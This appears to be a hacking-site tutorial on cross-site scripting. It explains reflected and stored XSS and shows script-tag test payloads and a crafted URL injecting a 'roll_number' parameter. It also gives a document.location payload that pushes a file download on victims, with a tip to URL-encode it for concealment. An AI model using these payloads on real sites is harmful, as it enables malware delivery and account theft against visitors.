XSS flaw, Cross Site Scripting, discover the advantages of these flaws, discover the danger they represent! Read our article!

The XSS vulnerability, Cross Site Scripting, discover the advantages of these vulnerabilities, discover the danger they represent and the types of attacks that are possible, from simple user redirection to online file injection !

What is the XSS Vulnerability ?

The XSS or Cross Site Scripting vulnerability is one of the most common vulnerabilities on websites.

This flaw can be avoided, but sometimes web developers don’t pay enough attention to it and don’t clean or check their code, this flaw exists in web forms, comment sections or wherever text input is needed/required.

For example some free WordPress or Prestashop themes are extremely affected by some XSS flaws, developers in such a hurry to sell their theme made in a hurry, don’t care about this phenomenon which is a great threat for customers who buy their themes.

This article is a complement to our previous article : How to hack a website ?


What are the impacts of the XSS Vulnerability ?

It allows the attacker to inject scripts that can compromise the website and lead to the disclosure of confidential information or the theft of cookies that can end up causing account usurpation.

A FEW IMPORTANT TERMS BEFORE MOVING FORWARD :

HTTP REQUEST : Simple enough to understand..

Each time you launch a web page or get a file, your browser makes an http request directed to the website server.

This http request is managed by the web server and responds accordingly.

REQUEST PARAMETERS : A little more complex

This is where the script is injected into most of the common xss fault sites.

Example = http://example.com/test.php?a=1&b=2 In this example “a” and “b” are parameters with the respective values “1” and “2”.

The script is most often injected in the value of the parameter.


XSS Vulnerabilities Types

 REFLECTED Vulnerability OR NON-PERSISTANT XSS : This type of vulnerability xss is quite common.

It’s not very dangerous on its own, but when combined with social engineering, it can be deadly. In this type of xss flaw, the payload or script is part of the http request or URL.

Nothing is permanently stored on the web server in this type of xss, it can be used to specifically target a person, it consists of a trusted website link but the link consists of xss vector/script.

XSS Vulnerability : This type of xss is the most dangerous.

In this type of xss vulnerability, the attacker injects a script that remains permanently stored on the web page so that when someone visits this page, the malicious script is executed.

This can do a lot of damage.

This XSS flaw can also be used to disfigure the website (we will talk about this later).


How to find XSS Vulnerabilities on a website ?

So now we have a basic knowledge of XSS and we will go a little further and learn how to identify an XSS flaw in a website.

 

How to find flaws on the web

As you can see on the picture, the site contains an input field.

So, to identify the flaw it allows you to enter a simple script in the input field

<script>alert(“XSS found”)</script>

This script returns the following response and confirms that there is an xss vulnerability on the site.

web vulnerability - What is it and how to use it ?

To make sure we try to inject one more script in the search field and we can see the result.

<script>prompt(“XSS found”)</script>

XSS vulnerability how to use it ?

This confirms the XSS flaw.

This is a thoughtful type of xss and now the question is how to execute the script from the URL.

We will now analyze the HTTP requests made by the browser when we inject the script. Here are the search parameters.

flaw found

There are a total of 4 parameters.

We see that the script is injected in the “roll_number” parameter, so if we want the script to be executed from a URL, we’ll have to build a URL like this one

Thus, by executing the URL above, our script is also executed as shown in the image. We can execute any script this way.

http://www.example.com/find_result.php?submit=Result&m=98&roll_number=”><script>alert(“XSS+found+again”)</script>&s=147


How to use an XSS Vulnerability to make a visitor download a file ?

It will be easy once you understand all of the above.

In the URL we built above, if we replace this script with the upload of your file will start.

<script>document.location=”Link o f your file”</script>

XSS vulnerability file injection

The advantage is that the victim thinks that the file comes from a trusted website.

You can encode the url to hide your script in the url.

This tutorial is intended for educational purposes in order to pre-municate against this phenomenon that is increasingly affecting webmasters who are not very concerned about their security.


Hack a VPS server under VNC or RDP - How Hackers hack them ?
How to hack a VPS server under VNC or RDP ?

How do Hackers for Hack a VPS server that works with VNC or RDP ? We unveil one of their techniques in our article! Despite all the methods that can exist for dedicated or virtualized server hacking, this one is

How to recover passwords over the internet or locally ?
How to recover passwords over the internet or locally ?

Sniffing or how to recover passwords on your connection or secure internet. Here's how hackers can recover your passwords when you are connected to a public Wifi or to a site that does not benefit from the SSL protocol. How

Improve performance by changing the priority of a Windows process
How to easily gain performance under Windows ?

Want to boost your computer performance ? Did you know that you can gain performance on Windows just by changing the priority of a process ? You will be able to gain more FPS on your video games, they will

One thought on “What is the XSS vulnerability and how to use it ?

Leave a Reply

Your email address will not be published. Required fields are marked *